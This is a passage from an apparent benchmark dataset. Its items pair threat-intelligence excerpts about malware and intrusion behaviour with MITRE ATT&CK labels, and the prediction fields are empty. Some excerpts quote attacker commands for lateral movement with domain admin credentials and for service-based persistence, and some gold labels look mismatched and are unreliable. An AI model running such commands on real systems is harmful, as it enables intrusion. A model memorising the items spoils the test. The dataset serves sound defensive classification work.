- T1090: Proxy\n- Text: Gain access to the victim\u2019s network by logging into a public-facing system via Secure Shell (SSH) using a local account <user sftp> acquired during previous credential theft activities. Use port forwarding capabilities built into SSH on the public-facing system to establish a Remote Desktop Protocol (RDP) session to an internal server (Server 1) using a domain service account. From Server 1, establish another RDP session to a different internal server (Server 2) using a domain administrator\u2019s account\n\t - T1021.001: Remote Services - Remote Desktop Protocol\n\t - T1090.001: Proxy - Internal Proxy\n- Text: Additional Reading This PowerShell logging blog post contains more information on improving PowerShell visibility in your environment\n\t - T1546.013: Event Triggered Execution - PowerShell Profile\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n", "input": "\nSection 1 The first section of the PowerShell script is responsible for setting different key variables that are used by the remaining sections of the PowerShell script, especially the following variables: TEMpPAtH = \"C:\\ProgramData\\\" (the path used for storing the temp files) Get_vAlIdIP = https://api.ipify.org/ (used to get the public IP address of the machine) FIlENAmePATHP = WindowsDefender.ini (file used to store Powershell code) PRIVAtE = Private Key exponents PUbLIc = Public Key exponents Hklm = \"HKLM:\\Software\\\" Hkcu = \"HKCU:\\Software\\\" ValuE = \"kaspersky\" SYSID DrAGon_MidDLe = [array of proxy URLs] Among those variables, there is one variable of particular interest, DrAGon_MidDLe, which stores the list of proxy URLs (detailed at the end of the blog in the Network Indicators portion of the Indicators of Compromise section) that will be used to interact with the C2 server, as shown in Figure 12", "gold": "- T1546.013: Event Triggered Execution - PowerShell Profile\n- T1059.001: Command and Scripting Interpreter - PowerShell", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Stolen Pencil has a tool to add a Windows admin account in order to allow them to ensure continued access via RDP.\n\t - T1078.003: Valid Accounts - Local Accounts\n- Text: This folder is used as a temporary location to copy all files from a newly connected logical drive to and upload them to the C2 server. The files are transferred to the hardcoded C2 server \"195.62.52.93\" one by one via HTTP POST method. The following request is used which also includes information about the victim, the file to be transferred as well as the source drive\n\t - T1083: File and Directory Discovery\n\t - T1041: Exfiltration Over C2 Channel\n\t - T1071.001: Application Layer Protocol - Web Protocols\n- Text: LockBit 2.0 has been known to self-propagate via SMB.\n\t - T1021.002: Remote Services - SMB/Windows Admin Shares\n\t - T1021.002: Remote Services - SMB/Windows Admin Shares\n", "input": "\nThe webshell will iterate through the IP list and perform a series of commands for each IP, starting off with using the following command to connect to the remote system: net use [IP address] /user:[domain admin username] [domain admin password] 2>&1 After connecting to the remote system with net use, the webshell will run the following command to obtain a list of user folders: dir /b [IP address]\\c$\\Users 2>&1 With a list of user folders, the webshell will iterate through the list of users and enumerate all of the files in the following folders: [IP address]\\c$\\Users\\[username]\\Desktop [IP address]\\c$\\Users\\[username]\\Documents [IP address]\\c$\\Users\\[username]\\Downloads The Network Downloader function will gather all the files in these folders and use 7-Zip to compress and archive the files", "gold": "- T1033: System Owner/User Discovery\n- T1016: System Network Configuration Discovery\n- T1087: Account Discovery\n- T1204: User Execution", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Hydraq creates a backdoor through which remote attackers can monitor services.\n\t - T1007: System Service Discovery\n- Text: MuddyWater can disable the system's local proxy settings.\n\t - T1562.001: Impair Defenses - Disable or Modify Tools\n- Text: Machete has a component to check for running processes to look for web browsers.\n\t - T1057: Process Discovery\n", "input": "\nhas a feature to list the available services on the system.", "gold": "- T1007: System Service Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Dyre can detect sandbox analysis environments by inspecting the process list and Registry.\n\t - T1497.001: Virtualization/Sandbox Evasion - System Checks\n- Text: Some versions of CozyCar will check to ensure it is not being executed inside a virtual machine or a known malware analysis sandbox environment. If it detects that it is, it will exit.\n\t - T1497: Virtualization/Sandbox Evasion\n- Text: The payload uses WMI queries and checks running processes for evidence that the script may be executing within an analysis environment\n\t - T1047: Windows Management Instrumentation\n", "input": "\nQuery attempts to detect VirtualBox environment from the win32_BIOS WMI class. Query attempts to detect Bochs environment from the win32_BIOS WMI class. Query attempts to detect QEMU environment from the win32_BIOS WMI class. Query attempts to detect VirtualBox environment from the win32_BIOS WMI class. Query attempts to detect VMWare environment from the win32_BIOS WMI class. Query attempts to detect Xen environment from the win32_BIOS WMI class. Uses this query to check the system information for the string \u201cVMware\u201d", "gold": "- T1047: Windows Management Instrumentation", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT28 used weaponized Microsoft Word documents abusing the remote template function to retrieve a malicious macro.\n\t - T1221: Template Injection\n- Text: Narrow attacks targeted the Automotive industry among others, while the large malicious spam campaigns appear to be associated with threat actor TA505, an actor responsible for many large-scale attacks since at least 2014\n\t - T1204.002: User Execution - Malicious File\n- Text: The January 8 attack used a variant of the ThreeDollars delivery document, which we identified as part of the OilRig toolset based on attacks that occurred in August 2017. Instead, this attack involved delivering the OopsIE Trojan directly to the victim, most likely using a link in a spear phishing email. A New Attack On January 8, 2018, the OilRig threat group sent an email with the subject Beirut Insurance Seminar Invitation to an insurance agency in the Middle East. The OilRig group sent two emails to two different email addresses at the same organization within a six minutes time span. The recipient email addresses suggest they may be the addresses used for specific regional branches of the targeted organization. However, based upon the captured session data, it is highly likely the source email address was spoofed. The email contained an attachment named Seminar-Invitation.doc, which is a malicious Microsoft Word document we track as ThreeDollars. In this case, the ThreeDollars delivery document was not used and instead an attempt was made to deliver the OopsIE Trojan directly to the targeted organization, likely via a link within an email. While this is not a new tactic, this is the first instance where we have observed the OilRig using it in their playbook. As we have observed throughout our tracking of the OilRig group, adopting proven tactics has been a common behavior over time\n\t - T1566.001: Phishing - Spearphishing Attachment\n", "input": "\nThis includes, but is not limited to, the following: AES encryption of network communication File management Functionality to download, upload, and execute files Keylogging Remote desktop access Remote webcam viewing Reverse proxy Browser and FTP client password recovery The images below are what a target user opening a malicious RTF document would see from within Microsoft Word", "gold": "- T1105: Ingress Tool Transfer", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: can terminate a specific process by its process id.\n\t - T1543.003: Create or Modify System Process - Windows Service\n- Text: Hildegard has started a monero service.\n\t - T1543.002: Create or Modify System Process - Systemd Service\n- Text: AppleJeus has placed a plist file within the \"LaunchDaemons\" folder and launched it manually.\n\t - T1543.004: Create or Modify System Process - Launch Daemon\n", "input": "\ninstalls itself as a service to maintain persistence.", "gold": "- T1543.003: Create or Modify System Process - Windows Service", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: 37 38 zlib64.dll zlib32.dll Open source \u201czlib\u201d version 1.2.3 used by libpngXX.dll for compressing screenshots (ssXX.dll)\n\t - T1055: Process Injection\n\t - T1574.002: Hijack Execution Flow - DLL Side-Loading\n- Text: The attackers typically distribute Netwalker ransomware with the use of a reflective PowerShell loader script that has been protected from casual analysis with several layers of obfuscation\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n\t - T1027: Obfuscated Files or Information\n- Text: 1) Loads the image resource with name `T__6541957882` into memory. 3) Adds `0xEE` to the bytes to decode the DLL. 4) Reflectively loads decoded DLL into memory and executes it\n\t - T1620: Reflective Code Loading\n", "input": "\nSpecifically, we discovered code in the PowerShell script that was a match for code in Magic Unicorn containing the comment \u201cone line shellcode injection with native x86 shellcode\u201d", "gold": "- T1059: Command and Scripting Interpreter\n- T1064: Scripting", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: SDBbot is a new remote access Trojan (RAT) written in C++ that has been delivered by the Get2 downloader in recent TA505 campaigns. Its name is derived from the debugging log file (sdb.log.txt) and DLL name (BotDLL[.]dll) used in the initial analyzed sample. SDBbot is composed of three pieces: an installer, a loader, and a RAT component\n\t - T1055.001: Process Injection - Dynamic-link Library Injection\n\t - T1105: Ingress Tool Transfer\n- Text: injects itself into various processes depending on whether it is low integrity or high integrity.\n\t - T1055: Process Injection\n- Text: The plugin is designed to migrate the loader to the address space of another process. Injection parameters are set in the Lizar client configuration file. It should be noted that this plugin can be used not only to inject the loader, but also to execute other PE files in the address space of the specified process\n\t - T1055: Process Injection\n\t - T1055.002: Process Injection - Portable Executable Injection\n", "input": "\nInjects ma32.dll into \u201cwwahost.exe\u201d or \u201caudacity.exe\u201d", "gold": "- T1055: Process Injection", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: BRONZE BUTLER has created forged Kerberos Ticket Granting Ticket (TGT) and Ticket Granting Service (TGS) tickets to maintain administrative access.\n\t - T1550.003: Use Alternate Authentication Material - Pass the Ticket\n- Text: Mustang Panda has used vssadmin to create a volume shadow copy and retrieve the NTDS.dit file. Mustang Panda has also used \"reg save\" on the SYSTEM file Registry location to help extract the NTDS.dit file.\n\t - T1003.003: OS Credential Dumping - NTDS\n- Text: Ke3chang has used Mimikatz to generate Kerberos golden tickets.\n\t - T1558.001: Steal or Forge Kerberos Tickets - Golden Ticket\n", "input": "\nThe majority of businesses still maintain Windows-heavy user environments where certain core infrastructure components also operate under Windows servers (e.g., Active Directory, SharePoint, etc.)", "gold": "- T1010: Application Window Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Honeybee embeds a Visual Basic script within a malicious Word document as part of initial access; the script is executed when the Word document is opened.\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n- Text: Crutch is able to bypass some security layers by abusing legitimate infrastructure \u2013 here Dropbox \u2013 in order to blend into normal network traffic while exfiltrating stolen documents and receiving commands from its operators\n\t - T1102.002: Web Service - Bidirectional Communication\n- Text: Here is a list of the platforms used by this variant: Twitter, Yandex and Mediafire\n\t - T1102: Web Service\n", "input": "\nhas used a VBScript named \"ggldr\" that uses Google Apps Script, Sheets, and Forms services for C2.", "gold": "- T1102: Web Service", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Magic Hound has used quser.exe to identify existing RDP connections.\n\t - T1049: System Network Connections Discovery\n- Text: has a plugin that can perform ARP scanning as well as port scanning.\n\t - T1046: Network Service Discovery\n- Text: Fox Kitten has used Angry IP Scanner to detect remote systems.\n\t - T1018: Remote System Discovery\n", "input": "\nTrickbot uses this encrypted module to scan the network and steal relevant network information.", "gold": "- T1016: System Network Configuration Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Small Sieve can use a custom hex byte swapping encoding scheme to obfuscate tasking traffic.\n\t - T1132.002: Data Encoding - Non-Standard Encoding\n- Text: Denis encodes the data sent to the server in Base64.\n\t - T1132.001: Data Encoding - Standard Encoding\n- Text: The script gathers system specific data, such as the domain the system belongs to and the current username, that it constructs in the following format: \u00a0 \\:pass \u00a0 The above string is encoded using a custom base64 encoder to strip out non-alphanumeric characters (=, / and +) from the data and replaces them with domain safe values (01, 02 and 03 respectively)\n\t - T1132: Data Encoding\n", "input": "\nResponses from the C2 server are base32-encoded.", "gold": "- T1132: Data Encoding", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT32 has moved and renamed pubprn.vbs to a .txt file to avoid detection.\n\t - T1036.003: Masquerading - Rename System Utilities\n- Text: SUPERNOVA is implemented as a modification to the existing \u2018app_web_logoimagehandler.ashx.b6031896.dll\u2019 module of the SolarWinds Orion application. The purpose of this module, in it\u2019s legitimate form, is to return the logo image configured by the user to various web pages of the SolarWinds Orion web application. In legitimate operation, this class only contains the ProcessRequest() and LogoImageHandler() methods, a private static Log object, and public boolean parameter IsReusable\n\t - T1036.005: Masquerading - Match Legitimate Name or Location\n- Text: APT29 named tasks \"\\Microsoft\\Windows\\SoftwareProtectionPlatform\\EventCacheManager\" in order to appear legitimate.\n\t - T1036.004: Masquerading - Masquerade Task or Service\n", "input": "\ninstalls itself in %ALLUSERPROFILE%\\\\Application Data\\Microsoft\\MediaPlayer\\updatewindws.exe; the directory name is missing a space and the file name is missing the letter \"o.\"", "gold": "- T1036: Masquerading", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Stolen Pencil sent spearphishing emails containing links to domains controlled by the threat actor.\n\t - T1566.002: Phishing - Spearphishing Link\n- Text: KOCTOPUS has relied on victims clicking on a malicious link delivered via email.\n\t - T1204.001: User Execution - Malicious Link\n- Text: APT37 delivers malware using spearphishing emails with malicious HWP attachments.\n\t - T1566.001: Phishing - Spearphishing Attachment\n", "input": "\nhas sent spearphishing emails links and attachments attempting to get a user to click.", "gold": "- T1204: User Execution", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Dark Caracal has obfuscated strings in Bandook by base64 encoding, and then encrypting them.\n\t - T1027: Obfuscated Files or Information\n- Text: Sys10 uses an XOR 0x1 loop to encrypt its C2 domain.\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n- Text: Agent.btz saves system information into an XML file that is then XOR-encoded.\n\t - T1560.003: Archive Collected Data - Archive via Custom Method\n", "input": "\nuses various XOR techniques to obfuscate its components.", "gold": "- T1027: Obfuscated Files or Information", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: During one investigation, APT32 was observed using a privilege escalation exploit (CVE-2016-7255) masquerading as a Windows hotfix. In another investigation, APT32 compromised the McAfee ePO infrastructure to distribute their malware as a software deployment task in which all systems pulled the payload from the ePO server using the proprietary SPIPE protocol. APT32 also used hidden or non-printing characters to help visually camouflage their malware on a system. For example, APT32 installed one backdoor as a persistent service with a legitimate service name that had a Unicode no-break space character appended to it. Another backdoor used an otherwise legitimate DLL filename padded with a non-printing OS command control code\n\t - T1027: Obfuscated Files or Information\n\t - T1036.004: Masquerading - Masquerade Task or Service\n- Text: Earth Lusca created a service using the command \"sc create \u201cSysUpdate\u201d binpath= \u201ccmd /c start \u201c[file path]\u201d\u201d&&sc config \u201cSysUpdate\u201d start= auto&&net\nstart SysUpdate\" for persistence.\n\t - T1543.003: Create or Modify System Process - Windows Service\n- Text: LazyScripter has used several different security software icons to disguise executables.\n\t - T1036: Masquerading\n", "input": "\nSome variants add new services with display names generated by a list of hard-coded strings such as Application, Background, Security, and Windows, presumably as a way to masquerade as a legitimate service.", "gold": "- T1036: Masquerading", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT38 has used several code packing methods such as Themida, Enigma, VMProtect, and Obsidium, to pack their implants.\n\t - T1027.002: Obfuscated Files or Information - Software Packing\n- Text: macOS.OSAMiner has embedded Stripped Payloads within another run-only Stripped Payloads.\n\t - T1027.009: Obfuscated Files or Information - Embedded Payloads\n- Text: Gamaredon Group has used DOCX files to download malicious DOT document templates and has used RTF template injection to download malicious payloads. Gamaredon Group can also inject malicious macros or remote templates into documents already present on compromised systems.\n\t - T1221: Template Injection\n", "input": "\nIt should be noted that in most of these cases the backdoor was embedded as a packed payload in another executable or in a weaponized document file of some kind", "gold": "- T1027.002: Obfuscated Files or Information - Software Packing", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The resulting Interop.SHDocVw .NET assembly is packed with SmartAssembly and further obfuscated using Confuser v1.9.0.0\n\t - T1027.002: Obfuscated Files or Information - Software Packing\n\t - T1027: Obfuscated Files or Information\n- Text: shellcode decrypts and decompresses its RC4-encrypted payload.\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: has used cmd.exe to execute commmands.\n\t - T1059: Command and Scripting Interpreter\n", "input": "\nCode snippet of the obfuscated document After deobfuscation, we can see that the payload is written in the Perl programming language", "gold": "- T1027: Obfuscated Files or Information", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Attor has a plugin that collects information about inserted storage devices, modems, and phone devices.\n\t - T1120: Peripheral Device Discovery\n- Text: Flame appears to have two modules designed for infecting USB sticks, called \u201cAutorun Infector\u201d and \u201cEuphoria\u201d. We haven\u2019t seen them in action yet, maybe due to the fact that Flame appears to be disabled in the configuration data. Nevertheless, the ability to infect USB sticks exists in the code, and it\u2019s using two methods\n\t - T1091: Replication Through Removable Media\n- Text: Capable of stealing documents sent to the printer queue. Steals written CD images. Capable of stealing files previously seen on removable drives once they are available again. Steals Internet Explorer, Netscape Navigator, FireFox and RealNetworks cookies. If deleted from Frontend file or related registry values, it will reappear after reboot with a new name and startup type\n\t - T1025: Data from Removable Media\n", "input": "\nmonitors victims for insertion of removable drives. When dropped onto a second victim, it also enumerates drives connected to the system.", "gold": "- T1120: Peripheral Device Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: KONNI has used the command \"cmd /c tasklist\" to get a snapshot of the current processes on the target machine.\n\t - T1057: Process Discovery\n- Text: Babuk can enumerate all services running on a compromised host.\n\t - T1007: System Service Discovery\n- Text: has used Meterpreter to enumerate users on remote systems.\n\t - T1033: System Owner/User Discovery\n", "input": "\nlists the current processes running.", "gold": "- T1057: Process Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: NETWIRE has used .NET packer tools to evade detection.\n\t - T1027.002: Obfuscated Files or Information - Software Packing\n- Text: Mosquito\u2019s installer is obfuscated with a custom crypter to obfuscate the installer.\n\t - T1027: Obfuscated Files or Information\n- Text: Bazar can hash then resolve API calls at runtime.\n\t - T1027.007: Obfuscated Files or Information - Dynamic API Resolution\n", "input": "\nA variant uses a custom packer.", "gold": "- T1027.002: Obfuscated Files or Information - Software Packing", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Babuk has the ability to use the command line to control execution on compromised hosts.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: allows adversaries to execute shell commands on the infected host.\n\t - T1059: Command and Scripting Interpreter\n- Text: KeyBoy uses PowerShell commands to download and execute payloads.\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n", "input": "\nIt is used to create new processes, perform as a command line shell, and several other tasks", "gold": "- T1059: Command and Scripting Interpreter", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: CosmicDuke collects LSA secrets.\n\t - T1003.004: OS Credential Dumping - LSA Secrets\n- Text: TSCookie has the ability to steal saved passwords from the Internet Explorer, Edge, Firefox, and Chrome browsers.\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n- Text: CozyCar has executed Mimikatz to harvest stored credentials from the victim and further victim penetration.\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n", "input": "\nThe information contained in this data dump include: Stolen credentials Potential systems to login to using stolen credentials Deployed webshell URLs Backdoor tools Command and control server component of backdoor tools Scripts to perform DNS hijacking Documents identifying specific individual operators Screenshots of OilRig operational systems The Leak In mid-March 2019, an unknown entity appeared on several hacking forums and Twitter with the user handle @Mr_L4nnist3r claiming they had access to data dumps involving internal tools and data used by the OilRig group", "gold": "- T1003: OS Credential Dumping", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: This thread searches for for files with the following extensions on removable drives and copies them to \u2018c:\\system\u2019 every 5 seconds\n\t - T1005: Data from Local System\n\t - T1083: File and Directory Discovery\n\t - T1074.001: Data Staged - Local Data Staging\n\t - T1119: Automated Collection\n\t - T1025: Data from Removable Media\n- Text: Actors enumerated files and directories or may search in specific locations of a host or network share for certain information within a file system.\n\t - T1083: File and Directory Discovery\n- Text: automatically collects files from the local system and removable drives based on a predefined list of file extensions on a regular timeframe.\n\t - T1119: Automated Collection\n", "input": "\nsearches for interesting files (either a default or customized set of file extensions) on the local system. will scan the My Recent Documents, Desktop, Temporary Internet Files, and TEMP directories. also collects information stored in the Windows Address Book.", "gold": "- T1005: Data from Local System", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT29 has created self-signed digital certificates to enable mutual TLS authentication for malware.\n\t - T1587.003: Develop Capabilities - Digital Certificates\n- Text: XTunnel uses SSL/TLS and RC4 to encrypt traffic.\n\t - T1573.002: Encrypted Channel - Asymmetric Cryptography\n- Text: Bankshot generates a false TLS handshake using a public certificate to disguise C2 network communications.\n\t - T1001.003: Data Obfuscation - Protocol Impersonation\n", "input": "\ngenerates a false TLS handshake using a public certificate to disguise C2 network communications.", "gold": "- T1001: Data Obfuscation", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the 